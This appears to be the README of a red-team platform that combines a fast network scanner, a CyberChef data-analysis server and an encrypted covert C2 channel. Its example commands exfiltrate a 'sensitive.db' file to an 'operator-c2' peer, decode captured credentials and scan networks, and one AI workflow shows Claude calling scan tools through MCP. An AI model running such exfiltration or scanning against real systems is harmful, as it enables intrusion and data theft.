SPECTRE

Security Platform for Encrypted Comms, Testing, Enumeration, Recon

A unified offensive security toolkit combining wire-speed secure communications, high-performance network reconnaissance, and advanced data analysis into a cohesive operational platform with four interaction modes: CLI, TUI, GUI, and MCP Server.

---

Overview

SPECTRE is an integrated security operations platform that orchestrates three battle-tested tools into a unified workflow for authorized security testing, red team operations, and threat research.

Each component is a standalone, production-ready project — SPECTRE provides the orchestration layer that binds them into a cohesive operational platform, delivering capabilities far greater than the sum of its parts:

Component	Role	Capability	Version	Tests
WRAITH-Protocol	Encrypted Comms	Wire-speed secure file transfer, E2EE messaging, C2 infrastructure	v2.3.7	2,957
ProRT-IP	Enumeration & Recon	10M+ pps network scanning, service detection, OS fingerprinting	v1.0.0	2,557
CyberChef-MCP	Testing & Analysis	463 data manipulation operations, AI-powered via MCP	v1.9.0	689

Why SPECTRE?

Modern offensive security requires seamless tool integration. SPECTRE eliminates context-switching:

• Discover targets with ProRT-IP's high-speed reconnaissance (10M+ pps)
• Analyze captured data with CyberChef's 463 operations via AI-assisted workflows
• Exfiltrate securely via WRAITH's traffic-obfuscated channels (10+ Gbps)
• Coordinate red team operations through unified orchestration with campaign management
• Automate complex workflows with inter-component data pipelines

Platform Metrics

Metric	Value
Combined Tests	7,378 (SPECTRE: 1,175 + WRAITH: 2,957 + ProRT-IP: 2,557 + CyberChef: 689)
SPECTRE Codebase	~45,000 lines Rust + TypeScript (136 Rust files + 60 frontend files)
Component Code	~180,000 (Rust) + ~40,000 (TypeScript/JavaScript)
Languages	Rust 2024, TypeScript, JavaScript
Network Throughput	10+ Gbps (WRAITH), 10M+ pps (ProRT-IP)
Data Operations	463 via CyberChef MCP
Interface Modes	CLI (implemented), TUI (implemented), GUI (frontend foundation), MCP Server
Platforms	Linux, Windows, macOS, Docker

---

Interface Modes

SPECTRE provides four distinct interaction methods to suit different operational contexts:

┌────────────────────────────────────────────────────────────────────┐
│                        SPECTRE INTERFACE MODES                     │
├────────────────────────────────────────────────────────────────────┤
│                                                                    │
│   ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────────────┐   │
│   │   CLI    │  │   TUI    │  │   GUI    │  │    MCP Server    │   │
│   │ spectre  │  │ spectre  │  │ spectre  │  │ spectre-mcp      │   │
│   │   cmd    │  │    tui   │  │   --gui  │  │                  │   │
│   ├──────────┤  ├──────────┤  ├──────────┤  ├──────────────────┤   │
│   │ Scripts  │  │ Real-    │  │ Visual   │  │ AI-Assisted      │   │
│   │ Pipelines│  │ time     │  │ Campaign │  │ Natural Language │   │
│   │ Automated│  │ Dashboard│  │ Planning │  │ Claude/Cursor    │   │
│   └────┬─────┘  └────┬─────┘  └────┬─────┘  └────────┬─────────┘   │
│        │             │             │                 │             │
│        └─────────────┴─────────────┴─────────────────┘             │
│                              │                                     │
│                    ┌─────────▼─────────┐                           │
│                    │  SPECTRE Core     │                           │
│                    │  Orchestrator     │                           │
│                    └─────────┬─────────┘                           │
│                              │                                     │
│        ┌─────────────────────┼─────────────────────┐               │
│        ▼                     ▼                     ▼               │
│   ┌─────────┐          ┌─────────┐          ┌─────────┐            │
│   │ProRT-IP │          │CyberChef│          │ WRAITH  │            │
│   │ WarScan │          │   MCP   │          │Protocol │            │
│   └─────────┘          └─────────┘          └─────────┘            │
│                                                                    │
└────────────────────────────────────────────────────────────────────┘

CLI — Command Line Interface

Primary interface for scripting, automation, and CI/CD integration.

# Unified command interface with subcommand routing
spectre scan -sS -p 1-1000 192.168.1.0/24        # ProRT-IP scanning
spectre chef "From_Base64,Gunzip" --input data   # CyberChef analysis
spectre send file.db --peer c2-server --encrypt  # WRAITH transfer
spectre campaign run red-team-op.yaml            # Full workflow

# Pipeline support for complex operations
spectre scan --output json 10.0.0.0/24 | \
  spectre chef "Extract_URLs,Defang_URL" | \
  spectre report --format markdown

Features:

• Nmap-compatible syntax for ProRT-IP operations
• Recipe-based CyberChef workflows
• Pipeline composition with JSON/Protocol Buffers
• Campaign definition via YAML
• Shell completion (bash, zsh, fish, PowerShell)

TUI — Terminal User Interface

Real-time operational dashboard leveraging ProRT-IP's 60 FPS TUI framework.

spectre tui                         # Launch full TUI dashboard (alias: spectre ui)
spectre scan --tui 192.168.1.0/24   # Scan with live visualization

Dashboard Panels:

┌─────────────────────────────────────────────────────────────────────────────┐
│ SPECTRE v0.1.0 - Operation BLACKOUT               [Campaign: red-team-01]   │
├────────────────────────────────┬────────────────────────────────────────────┤
│ RECON STATUS                   │ ANALYSIS PIPELINE                          │
│ ┌────────────────────────────┐ │ ┌────────────────────────────────────────┐ │
│ │ Targets:  254/254 ████████ │ │ │ Input:   banners.txt (2.4 MB)          │ │
│ │ Ports:    1000   ████░░░░░ │ │ │ Recipe:  [Base64→Gunzip→JSON]          │ │
│ │ Services: 47 identified    │ │ │ Status:  Processing... 67%             │ │
│ │ Rate:     45,231 pps       │ │ │ Output:  decoded_payloads.json         │ │
│ └────────────────────────────┘ │ └────────────────────────────────────────┘ │
├────────────────────────────────┼────────────────────────────────────────────┤
│ COMMS STATUS                   │ CAMPAIGN TIMELINE                          │
│ ┌────────────────────────────┐ │ ┌────────────────────────────────────────┐ │
│ │ Channel:  TLS-mimicry      │ │ │ 14:00 ▶ Recon started                 │ │
│ │ Peer:     c2.operator.net  │ │ │ 14:15   47 services discovered         │ │
│ │ Latency:  23ms             │ │ │ 14:22   Analysis complete              │ │
│ │ Tx/Rx:    1.2GB / 45MB     │ │ │ 14:30   Exfil initiated                │ │
│ └────────────────────────────┘ │ └────────────────────────────────────────┘ │
├─────────────────────────────────────────────────────────────────────────────┤
│ [F1] Help  [F2] Scan  [F3] Analyze  [F4] Comms  [F5] Report  [q] Quit       │
└─────────────────────────────────────────────────────────────────────────────┘

Features:

• 60 FPS async rendering with crossterm backend and panic-safe terminal restoration
• 4-panel layout (Recon, Analysis, Comms, Campaign) with 4 layout modes (Grid/Wide/Tall/Focus)
• Real-time scan progress with rate metrics, ETA, scrollable results browser
• Vim-style keyboard navigation (j/k/h/l, g/G, Ctrl+d/u) plus F-key panel switching
• Command mode (:) with 11 commands, history, tab completion
• 5 built-in themes (dark, light, tactical, matrix, hacker) with runtime switching
• Help overlay (?/F1) with grouped keyboard shortcut reference

GUI — Graphical User Interface

Native desktop application for campaign planning and visual operations.

# Development mode
cd crates/spectre-gui
./dev.sh                         # Auto-detects Wayland/X11, applies GPU workarounds

# Production build
cargo build --release -p spectre-gui
./target/release/spectre-gui

# Manual overrides (if auto-detection fails)
./dev.sh --force-x11             # Force X11 backend
./dev.sh --force-wayland         # Force Wayland backend
./dev.sh --verbose               # Enable debug logging

Automatic Display Server Detection:

The GUI automatically detects your display server (Wayland vs X11) and GPU vendor, then applies appropriate workarounds for optimal WebKitGTK rendering:

• NVIDIA GPUs: Automatically uses X11 backend with DMABUF renderer disabled (known Wayland compatibility issues)
• Intel/AMD GPUs: Uses native Wayland when available, falls back to X11 if needed
• Manual Overrides: Respected if you set GDK_BACKEND environment variable

Implemented Features (v0.5.0 - Stable Release):

Dashboard & Real-Time Monitoring:

• Real-time statistics with severity charts and service distribution
• Activity timeline with relative timestamps and status icons
• SeverityChart: Interactive pie chart showing Critical/High/Medium/Low/Info distribution (Recharts)
• ServicesChart: Bar chart displaying top 10 discovered services

Reports & Data Export:

• Sortable, filterable, paginated findings table with search functionality
• 5 export formats: CSV, JSON, XML, HTML (templated), Markdown (templated)
• FindingDetail modal with CVE links, risk descriptions, remediation advice
• Secure preview with DOMPurify sanitization and syntax highlighting

Campaign Planning:

• 4-step wizard with target parsing and phase timeline
• CRUD operations: create, list, view, advance, export, import, archive
• ObjectiveList, PhaseTimeline, TargetInput components
• Campaign state persistence with SQLite backend

Scan Visualization:

• D3.js network topology with force-directed layout
• Real-time event streaming with host/port/service nodes
• ScanProgress bars, HostCard details, ResultsTable views

Settings Management (8 tabs):

• General: Verbosity levels, color output
• Scan: Timing templates (T0-T5), port presets, detection toggles
• Analysis: CyberChef Docker configuration
• Comms: WRAITH protocol settings
• Output: Format selection (table/JSON/YAML/XML/CSV), pretty formatting
• Theme: 5 themes with live preview (dark, light, tactical, matrix, hacker)
• Shortcuts: Complete keyboard reference
• About: Version info, component versions, tech stack, license

Analysis Operations:

• CyberChef integration with 15 operations across 4 categories
• Real-time transformations: Base64, Hex, URL encode/decode
• Category filtering (Encoding, Hashing, Encryption, Compression)
• Input/Output panels with error handling

Secure Communications:

• Identity management with fingerprint display
• Peer list with online/offline status
• Encrypted data transmission interface
• WRAITH protocol integration

Security & Performance:

• HTML sanitization with DOMPurify for safe HTML previews
• Secure iframe sandboxing for rendered content
• 30-second auto-refresh for dashboard statistics
• Multi-scan support with Zustand state management
• WCAG 2.1 AA accessibility compliance (ARIA labels, keyboard navigation, focus management)
• Optimized bundle size: < 300KB gzipped (React.lazy code splitting)
• D3.js force simulation optimization (< 2s convergence)

Technology Stack:

• Tauri 2.10 framework (Rust backend with 22 IPC handlers)
• React 19 + TypeScript frontend (Vite 6 dev server)
• Tailwind CSS 4 for styling + 12 shadcn/ui components
• Zustand state management (scanStore, campaignStore, dashboardStore)
• D3.js 7 for network topology visualization
• Recharts 2 for statistical charts
• React Router 7 for navigation

Troubleshooting:

If you experience display issues (blank window, GBM buffer errors, etc.), see GUI Display Issues Troubleshooting Guide.

MCP Server — AI-Assisted Operations

Model Context Protocol server exposing SPECTRE capabilities to AI assistants.

spectre-mcp serve                # Start MCP server (stdio transport)

Claude/Cursor Integration:

{
    "mcpServers": {
        "spectre": {
            "command": "spectre-mcp",
            "args": ["serve"]
        }
    }
}

MCP Tools Exposed:

Tool Category	Operations	Description
spectre_scan_*	8 scan types	SYN, Connect, FIN, NULL, Xmas, ACK, Idle, UDP
spectre_detect_*	Service/OS	Service detection, OS fingerprinting
spectre_chef_*	463 operations	All CyberChef operations as individual tools
spectre_send/receive	File transfer	Encrypted P2P file operations
spectre_campaign_*	Orchestration	Campaign create/run/status/abort
spectre_recipe_*	10 tools	Recipe CRUD, export, import, test

AI Workflow Example:

User: "Scan 192.168.1.0/24 for web servers, analyze their banners,
       and extract any base64-encoded data"

Claude: I'll create a workflow to accomplish this:
        1. spectre_scan_syn(target="192.168.1.0/24", ports="80,443,8080")
        2. spectre_detect_service(hosts=<scan_results>)
        3. spectre_chef_from_base64(input=<extracted_base64>)

---

Architecture

System Design

SPECTRE follows a modular microservices architecture where each component operates independently but communicates through well-defined interfaces:

┌───────────────────────────────────────────────────────────────────────────┐
│                           SPECTRE PLATFORM                                │
├───────────────────────────────────────────────────────────────────────────┤
│  INTERFACE LAYER                                                          │
│  ┌──────────┐  ┌──────────┐  ┌──────────┐  ┌──────────────────┐           │
│  │   CLI    │  │   TUI    │  │   GUI    │  │    MCP Server    │           │
│  │  (clap)  │  │(ratatui) │  │ (Tauri)  │  │     (stdio)      │           │
│  └────┬─────┘  └────┬─────┘  └────┬─────┘  └────────┬─────────┘           │
│       └─────────────┴─────────────┴─────────────────┘                     │
│                              │                                            │
├──────────────────────────────┼────────────────────────────────────────────┤
│  ORCHESTRATION LAYER         ▼                                            │
│  ┌─────────────────────────────────────────────────────────────────────┐  │
│  │                      SPECTRE CORE                                   │  │
│  │  ┌─────────────┐  ┌─────────────┐  ┌─────────────┐  ┌────────────┐  │  │
│  │  │  Campaign   │  │    Data     │  │   Workflow  │  │   Config   │  │  │
│  │  │  Manager    │  │   Router    │  │   Engine    │  │   Store    │  │  │
│  │  └─────────────┘  └─────────────┘  └─────────────┘  └────────────┘  │  │
│  └─────────────────────────────────────────────────────────────────────┘  │
│                              │                                            │
├──────────────────────────────┼────────────────────────────────────────────┤
│  COMPONENT LAYER             │                                            │
│       ┌──────────────────────┼──────────────────────┐                     │
│       ▼                      ▼                      ▼                     │
│  ┌─────────────────┐  ┌─────────────────┐  ┌─────────────────┐            │
│  │    ProRT-IP     │  │  CyberChef-MCP  │  │ WRAITH-Protocol │            │
│  │    WarScan      │  │                 │  │                 │            │
│  ├─────────────────┤  ├─────────────────┤  ├─────────────────┤            │
│  │ • SYN/Connect   │  │ • 463 Ops       │  │ • E2EE Xfer     │            │
│  │ • FIN/NULL/Xmas │  │ • Encoding      │  │ • Double Ratchet│            │
│  │ • Idle/Zombie   │  │ • Crypto        │  │ • Traffic Obfsc │            │
│  │ • UDP w/Probes  │  │ • Forensics     │  │ • C2 Channel    │            │
│  │ • Svc Detection │  │ • Compression   │  │ • 12 Clients    │            │
│  │ • OS Fingerprnt │  │ • Recipe Mgmt   │  │ • RedOps        │            │
│  │ • Lua Plugins   │  │ • Batch Process │  │ • Post-Quantum  │            │
│  └─────────────────┘  └─────────────────┘  └─────────────────┘            │
│        Rust                  Node.js              Rust                    │
│     (lib + CLI)           (Docker MCP)        (lib + 12 apps)             │
│                                                                           │
└───────────────────────────────────────────────────────────────────────────┘

Data Flow

┌──────────────┐      ┌───────────────┐      ┌────────────────┐      ┌───────────────┐
│    Target    │────▶│   ProRT-IP    │────▶│   CyberChef    │────▶│     WRAITH    │
│   Network    │      │     Recon     │      │    Analysis    │      │   Exfil/C2    │
└──────────────┘      └───────┬───────┘      └───────┬────────┘      └───────┬───────┘
                             │                     │                       │
                             ▼                     ▼                       ▼
                        scan.json            decoded.txt           secure_channel
                        hosts.xml            decrypted.bin         encrypted_xfer
                        services.db          forensic.log          covert_comms
                        os_info.json         patterns.json         c2_traffic

┌─────────────────────────────────────────────────────────────────────────────────┐
│                           UNIFIED DATA MODEL                                    │
│  ┌─────────────┐  ┌─────────────┐  ┌─────────────┐  ┌─────────────────────────┐ │
│  │   Target    │  │   Finding   │  │  Artifact   │  │      Campaign           │ │
│  │  • IP/CIDR  │  │  • Port     │  │  • File     │  │  • State machine        │ │
│  │  • Hostname │  │  • Service  │  │  • Data     │  │  • Phase tracking       │ │
│  │  • OS info  │  │  • Vuln     │  │  • Evidence │  │  • Timeline             │ │
│  └─────────────┘  └─────────────┘  └─────────────┘  └─────────────────────────┘ │
└─────────────────────────────────────────────────────────────────────────────────┘

Integration Layers

Layer	Purpose	Technology	Status
CLI Orchestrator	Unified command interface (13 subcommands)	Rust (clap 4)	Implemented
Core Library	Config, scanning, comms, analysis, orchestration	Rust (tokio, serde, tracing)	Implemented
ProRT-IP Integration	Real scanner via prtip_adapter (8 scan types)	Rust (prtip-core, prtip-scanner)	Implemented
WRAITH Integration	Real E2EE comms via wraith_adapter (Noise_XX)	Rust (wraith-core, wraith-crypto)	Implemented
CyberChef Integration	Real MCP client via mcp_adapter (JSON-RPC/stdio)	Docker, JSON-RPC 2.0, tokio	Implemented
Target Management	Priority queue, scope enforcement, async DNS	Rust (ipnetwork, tokio)	Implemented
Job Orchestration	State machine, concurrency control, events	Rust (tokio, broadcast channels)	Implemented
Results Aggregation	Findings, JSON/XML/greppable output, stats	Rust (serde, quick-xml)	Implemented
Data Pipeline	Composable stages, builder API, metrics	Rust (async-trait, tokio)	Implemented
Campaign Management	SQLite persistence, phases, artifacts	Rust (rusqlite, sha2)	Implemented
Plugin System	Lua 5.4 sandbox, manifest, permissions, registry	Rust (mlua)	Implemented
TUI Framework	Real-time dashboard (60 FPS, 4-panel, 5 themes)	Rust (ratatui 0.30, crossterm)	Implemented
Scan Orchestration	Chaining, templates, scheduling, adaptive timing	Rust (tokio, async-trait)	Implemented
Workflow Engine	YAML/JSON/TOML DSL, executor, variables, loops	Rust (serde, tokio)	Implemented
Recipe Management	Storage, versioning, search, built-in library	Rust (serde, toml)	Implemented
Report Generation	HTML and Markdown reports, executive summaries	Rust (templates)	Implemented
Export System	CSV, custom templates, incremental export	Rust (serde)	Implemented
Performance Layer	LRU cache, connection pool, metrics collection	Rust (tokio)	Implemented
GUI Application	Tauri 2.10 desktop app, 21 IPC commands (scaffold)	Tauri 2.10, React 19, TypeScript	Scaffold
MCP Server	AI-assisted operations	Rust, MCP Protocol	Planned

---

Components

WRAITH-Protocol — Encrypted Communications

Wire-speed Resilient Authenticated Invisible Transfer Handler

The covert communications backbone of SPECTRE, providing military-grade secure file transfer with traffic analysis resistance.

Capability	Specification
Throughput	10+ Gbps with AF_XDP kernel bypass
Encryption	XChaCha20-Poly1305, Noise_XX, Double Ratchet
Obfuscation	Elligator2, protocol mimicry (TLS/WebSocket/DoH)
Applications	12 clients (Transfer, Chat, Sync, Vault, RedOps, etc.)
Post-Quantum	Hybrid X25519 + ML-KEM-768 KEX
Tests	2,957 passing
Code	~141,000 lines Rust + ~36,600 lines TypeScript

Key Features:

• Perfect forward secrecy via Double Ratchet
• Traffic analysis resistance (Elligator2 key encoding)
• Protocol mimicry (TLS 1.3, WebSocket, DNS-over-HTTPS)
• Red team C2 infrastructure (WRAITH-RedOps) with 97.5% MITRE ATT&CK coverage
• 12 production clients including mobile (Android/iOS)

SPECTRE Integration Points:

• wraith-core library for encrypted transport
• wraith-ffi for FFI bindings
• Campaign coordination via WRAITH-RedOps team server

Repository: github.com/doublegate/WRAITH-Protocol

---

ProRT-IP WarScan — Enumeration & Reconnaissance

High-performance network scanner combining Masscan/ZMap speed with Nmap detection depth.

Capability	Specification
Throughput	10M+ packets/second (stateless), 72K+ pps (verified)
Scan Types	SYN, Connect, FIN, NULL, Xmas, ACK, Idle, UDP
Detection	Service detection (85-90%), OS fingerprinting (2,600+ sigs)
Evasion	Fragmentation, TTL, decoys, timing templates (T0-T5)
IPv6	Full dual-stack support across all scan types
TUI	60 FPS production dashboard, 11 widgets
Tests	2,557 passing, 51.40% coverage

Key Features:

• Nmap-compatible CLI syntax (-sS, -sV, -O, -A)
• Lua 5.4 plugin system for custom detection
• PCAPNG packet capture
• O(N) connection tracking (50-1000x speedup)
• NUMA-optimized for multi-socket systems

SPECTRE Integration Points:

• TUI framework reuse for SPECTRE dashboard
• Scan result JSON/XML output to data pipeline
• Plugin system extensible for SPECTRE workflows

Repository: github.com/doublegate/ProRT-IP

---

CyberChef-MCP — Testing & Analysis

MCP server exposing CyberChef's 463 operations as AI-callable tools for data manipulation, cryptanalysis, and forensic analysis.

Capability	Specification
Operations	463 data manipulation tools
Interface	Model Context Protocol (MCP), stdio transport
Categories	Encoding, encryption, compression, forensics
Deployment	Docker (Chainguard distroless, ~90MB)
Recipe Mgmt	10 tools for workflow save/reuse
Batch Processing	Parallel execution up to 100 operations
Tests	689 passing, 74.97% coverage

Key Features:

• AI-native via MCP (works with Claude, Cursor, etc.)
• Recipe management with CRUD, import/export (JSON/YAML/URL)
• Batch processing (parallel/sequential execution)
• Zero-CVE Chainguard base image
• SLSA Build Level 3 provenance

MCP Tools:

• cyberchef_bake — Execute full recipes
• cyberchef_search — Discover operations
• 463 individual operation tools (cyberchef_to_base64, cyberchef_aes_decrypt, etc.)
• 10 recipe management tools
• 5 advanced feature tools (batch, cache, telemetry, quota)

SPECTRE Integration Points:

• Direct MCP bridge for AI-assisted analysis
• Recipe library for common security workflows
• Batch processing for bulk data operations

Repository: github.com/doublegate/CyberChef-MCP

---

Use Cases

Red Team Operations

# 1. Reconnaissance: Enumerate target network
spectre scan -sS -sV --top-ports 1000 10.0.0.0/24 -oJ recon.json

# 2. Analysis: Decode captured credentials
spectre chef --recipe "From_Base64,URL_Decode,Gunzip" --input creds.txt

# 3. Exfiltration: Secure data extraction via covert channel
spectre send --file sensitive.db --peer operator-c2 --mimicry tls

# 4. Campaign Orchestration: Full automated workflow
spectre campaign run red-team-op.yaml --target enterprise-network

Threat Research

# Capture traffic, analyze protocols, identify patterns
spectre scan --capture pcap -p 443 10.0.0.0/24 | \
  spectre chef "Extract_URLs,Defang_URL,Unique" | \
  spectre report --format json --output indicators.json

# TUI mode for live analysis
spectre tui

Security Auditing

# Full network assessment with automated analysis
spectre audit \
  --targets targets.txt \
  --scan-type comprehensive \
  --analyze-banners \
  --output-dir ./audit-results \
  --report-format pdf

AI-Assisted Operations

# In Claude Code or Cursor with SPECTRE MCP enabled:

User: "Find all web servers on 192.168.1.0/24, extract TLS certificates,
       and identify any with expired or self-signed certs"

Claude: I'll execute this multi-step workflow:
        1. spectre_scan_syn(target="192.168.1.0/24", ports="443,8443")
        2. spectre_detect_tls_cert(hosts=<scan_results>)
        3. spectre_chef_parse_x509(input=<certificates>)
        4. Filter and report findings...

---

Quick Start

Prerequisites

• Rust 1.92+ (for WRAITH, ProRT-IP, SPECTRE)
• Node.js 22+ (for CyberChef-MCP)
• Docker (recommended for CyberChef-MCP deployment)
• Linux kernel 6.2+ (recommended for AF_XDP/io_uring performance)
• libpcap (Linux/macOS) or Npcap (Windows) for raw packet access

Installation

Pre-built Binaries (Recommended for End Users)

Download the latest release for your platform from GitHub Releases:

Linux:

• spectre-gui-linux.AppImage (self-contained, no installation required)
• spectre-gui-linux.deb (Debian/Ubuntu)
• spectre-gui-linux.rpm (Fedora/RHEL/CentOS)

macOS:

• spectre-gui-macos-x86_64.dmg (Intel Macs)
• spectre-gui-macos-aarch64.dmg (Apple Silicon M1/M2/M3)

Windows:

• spectre-gui-windows.msi (Windows Installer)
• spectre-gui-windows.exe (Nullsoft installer)

Platform Requirements:

See Platform Requirements for detailed system dependencies.

Continuous Integration & Delivery

SPECTRE uses GitHub Actions for comprehensive cross-platform CI/CD:

Multi-Platform Builds:

• Linux x86_64 (ubuntu-22.04)
• macOS Intel x86_64 (macos-15-intel)
• macOS Apple Silicon ARM64 (macos-14)
• Windows x86_64 (windows-2022)

Automated Installers:

• Linux: AppImage, .deb, .rpm
• macOS: .dmg (Intel and Apple Silicon)
• Windows: .msi, .exe (NSIS)

Testing:

• 1,175 tests across all platforms
• Frontend type checking and tests (117 tests)
• Rust workspace tests (1,058 tests)
• Platform-specific test scripts for local validation

Workflows:

• .github/workflows/ci.yml - Main CI with format, lint, test, audit
• .github/workflows/gui.yml - GUI-specific builds with 4-platform matrix
• .github/workflows/release.yml - Automated installer generation

See CI/CD Documentation for workflow details.

Building from Source

Clone SPECTRE and submodules:

git clone --recursive https://github.com/doublegate/SPECTRE.git
cd SPECTRE

Or initialize submodules in an existing clone:

git submodule update --init --recursive

Build all Rust components:

# Build SPECTRE CLI and integrated components
cargo build --release --workspace

# Grant network capabilities (instead of root)
sudo setcap cap_net_raw,cap_net_admin=eip target/release/spectre

Setup CyberChef-MCP:

# Pull pre-built container (recommended)
docker pull doublegate/cyberchef-mcp:latest

# Or build from source
cd components/cyberchef-mcp
docker build -f Dockerfile.mcp -t cyberchef-mcp .

Verify installation:

spectre --version
spectre status        # Check all component health
spectre self-test     # Run integration tests

Basic Usage

# CLI: Quick port scan
spectre scan -sS -p 80,443,8080 192.168.1.0/24

# CLI: Analyze data with CyberChef
spectre chef "From_Base64" --input encoded.txt

# CLI: Secure file transfer
spectre send document.pdf --peer <peer-id> --encrypt

# TUI: Launch dashboard
spectre tui

# GUI: Development mode (auto-detects Wayland/X11)
cd crates/spectre-gui
./dev.sh

# GUI: Production build
cargo build --release -p spectre-gui
./target/release/spectre-gui

# MCP: Start server for AI integration
spectre-mcp serve

GUI Development Quick Start

The GUI requires both frontend and backend development servers:

# Terminal 1: Start frontend dev server
cd crates/spectre-gui/frontend
pnpm install
pnpm dev

# Terminal 2: Start Tauri (auto-detects display server and GPU)
cd crates/spectre-gui
./dev.sh

Manual Display Server Overrides:

./dev.sh --force-x11      # Force X11 backend (NVIDIA GPUs)
./dev.sh --force-wayland  # Force Wayland backend
./dev.sh --verbose        # Enable debug logging

---

Development Roadmap

Release Codenames

SPECTRE releases follow an operational codename convention:

Version	Codename	Focus	Interface Milestone
v0.1.0	Operation BLACKOUT	Foundation — CLI skeleton, component integration	CLI MVP
v0.2.0	Operation NIGHTFALL	Data pipeline, scan-to-analysis automation	CLI + Data Pipeline
v0.3.0	Operation PHANTOM	Campaign orchestration, multi-target coordination	TUI MVP
v0.4.0	Operation SPECTER	Advanced features, workflows, reporting	Advanced Engine
v0.5.0	Operation SHADOW	Visual campaign planning, collaboration	GUI MVP
v1.0.0	Operation GENESIS	Production release — full platform capability	All 4 Interfaces

Phase 1: Foundation — Operation BLACKOUT (Complete)

• SPECTRE CLI skeleton with subcommand routing (13 commands, Nmap-compatible flags)
• Component version detection and health checks (spectre status)
• Unified configuration management (TOML with file discovery and env var support)
• Structured logging with tracing (RUST_LOG, file output, JSON format)
• ProRT-IP scanning interface (Scanner trait, port/target parsing, 8 scan types) — real ProRT-IP integration via prtip_adapter (v0.4.4)
• WRAITH comms interface (identity management, peer management, send/receive) — real WRAITH integration via wraith_adapter (v0.4.5)
• CyberChef MCP bridge (Docker container management, recipe execution) — real MCP client via mcp_adapter (v0.4.6)
• Shell completion generation (bash, zsh, fish, PowerShell)
• 86 unit tests passing, zero clippy warnings

Phase 2: Core Orchestration — Operation NIGHTFALL (Complete)

• Target management with priority queue, scope enforcement, CIDR expansion, async DNS resolution
• Job orchestration with state machine (Created->Queued->Running->Paused->Complete/Failed/Cancelled), concurrency control, event broadcasting
• Results aggregation with Finding model, JSON/XML/greppable output, host/service grouping, statistics
• Data pipeline with composable stages (Scan->Analysis->Filter->Output), builder API, execution metrics
• Campaign management with SQLite persistence, phase state machine, artifact storage with SHA-256 hashing
• Lua 5.4 plugin system with sandboxed execution, manifest-driven loading, permission model, resource limits
• 3 new CLI commands: campaign (7 subcommands), pipeline (3 subcommands), plugin (3 subcommands)
• 270 unit tests passing, zero clippy warnings

Phase 3: TUI Dashboard — Operation PHANTOM (Complete)

• TUI framework with async event loop, 60 FPS rendering, panic-safe terminal restoration
• 4-panel layout (Recon, Analysis, Comms, Campaign) with Grid/Wide/Tall/Focus modes
• Real-time scan display with progress bars, rate metrics, ETA calculation
• Results browser with scrollable host/port tables, filtering, and sorting
• Command input system with 11 commands, history navigation, tab completion
• Vim-style keyboard shortcuts with F-key panel switching, help overlay
• 5 built-in themes (dark, light, tactical, matrix, hacker) with runtime switching
• 235 unit tests passing, zero clippy warnings

Phase 4: Advanced Features — Operation SPECTER (Complete)

• Advanced scan orchestration: chaining, conditional execution, templates, scheduling, profiles, adaptive timing, checkpoint/resume
• Workflow automation: YAML/JSON/TOML DSL, parser, async executor with variables, conditionals, loops, retry logic
• Recipe management: file-based storage, import/export, versioning, search, validation, built-in library
• Report generation: HTML and Markdown generators, executive summaries, risk scoring, severity breakdown
• Export formats: CSV exporter (results/hosts/findings), custom template engine, incremental export tracking
• Performance optimization: LRU cache, connection pool with async mutex, performance metrics (timing + counters)
• Advanced plugin system: registry with dependency resolution, event hooks (10 lifecycle events), template scaffolding (5 types)
• 45 integration tests across 6 test suites, 351 new unit tests

Phase 5: Visual Interface — Operation SHADOW (In Progress)

• Tauri 2.10 desktop application scaffold with React 19 + TypeScript + Vite 6 frontend
• 21 IPC command handlers (2 fully wired: get_version, get_status; 19 stubs)
• AppState with RwLock<Config>, managed by Tauri .manage()
• Event payload types for scan progress/results/completion/error streaming
• Tauri plugins: shell, window-state, store
• 37 tests (32 Rust unit + 5 frontend vitest)
• React Router + Tailwind CSS + shadcn/ui + Zustand state management
• Campaign planning workspace
• Network topology visualization (D3.js)
• Results dashboard with charts (Recharts)
• Settings, Analysis & Comms pages
• Cross-platform testing and installers

Future Enhancements

• Automated vulnerability correlation
• Integration with external threat intel feeds
• Kubernetes deployment (Helm chart)
• Distributed scanning coordinator

---

Project Structure

SPECTRE/
├── Cargo.toml              # Workspace manifest
├── Cargo.lock              # Dependency lock file
├── .gitmodules             # Git submodule definitions
├── README.md               # This file
├── CHANGELOG.md            # Version history
├── CLAUDE.md               # AI assistant guidance
├── CONTRIBUTING.md         # Contribution guidelines
├── SECURITY.md             # Security policy
├── LICENSE                 # License file
├── rustfmt.toml            # Rust formatting config
├── clippy.toml             # Rust linting config
├── .editorconfig           # Editor standards
│
├── components/             # Git submodules (standalone component repos)
│   ├── wraith-protocol/    # WRAITH-Protocol (v2.3.7) - Secure communications
│   ├── prtip/              # ProRT-IP WarScan (v1.0.0) - Network reconnaissance
│   └── cyberchef-mcp/      # CyberChef-MCP (v1.9.0) - Data analysis
│
├── crates/
│   ├── spectre-cli/        # Unified CLI orchestrator (18 files, 44 tests)
│   │   │                   # Depends on spectre-core, spectre-tui
│   │   ├── Cargo.toml
│   │   └── src/
│   │       ├── main.rs         # Entry point, CLI parsing
│   │       ├── commands/       # 13 subcommand implementations
│   │       │   ├── scan.rs         # Network scanning (ProRT-IP)
│   │       │   ├── chef.rs         # Data analysis (CyberChef-MCP)
│   │       │   ├── send.rs         # Secure send (WRAITH)
│   │       │   ├── receive.rs      # Secure receive (WRAITH)
│   │       │   ├── identity.rs     # Identity management
│   │       │   ├── peer.rs         # Peer management
│   │       │   ├── status.rs       # Component health checks
│   │       │   ├── config.rs       # Configuration management
│   │       │   ├── completions.rs  # Shell completion generation
│   │       │   ├── campaign.rs     # Campaign management (7 subcommands)
│   │       │   ├── pipeline.rs     # Data pipeline execution (3 subcommands)
│   │       │   ├── plugin.rs       # Plugin management (3 subcommands)
│   │       │   └── tui.rs          # TUI dashboard launcher
│   │       └── output/         # Output formatting
│   │           ├── table.rs        # Table output (comfy-table)
│   │           └── json.rs         # JSON output (serde_json)
│   ├── spectre-core/       # Core orchestration library (84 files, 618 unit + 45 integration tests)
│   │   ├── Cargo.toml
│   │   ├── src/
│   │   │   ├── lib.rs          # Library root (18 public modules)
│   │   │   ├── error.rs        # Error types (SpectreError, 20+ variants)
│   │   │   ├── logging.rs      # Tracing setup
│   │   │   ├── config/         # Configuration system
│   │   │   ├── scan/           # Scanning interface (8 scan types, ProRT-IP adapter)
│   │   │   ├── chef/           # CyberChef integration (MCP adapter, Docker, stub)
│   │   │   ├── comms/          # WRAITH integration (identity, peers, wraith_adapter)
│   │   │   ├── target/         # Target management (priority queue, scope)
│   │   │   ├── job/            # Job orchestration (state machine, events)
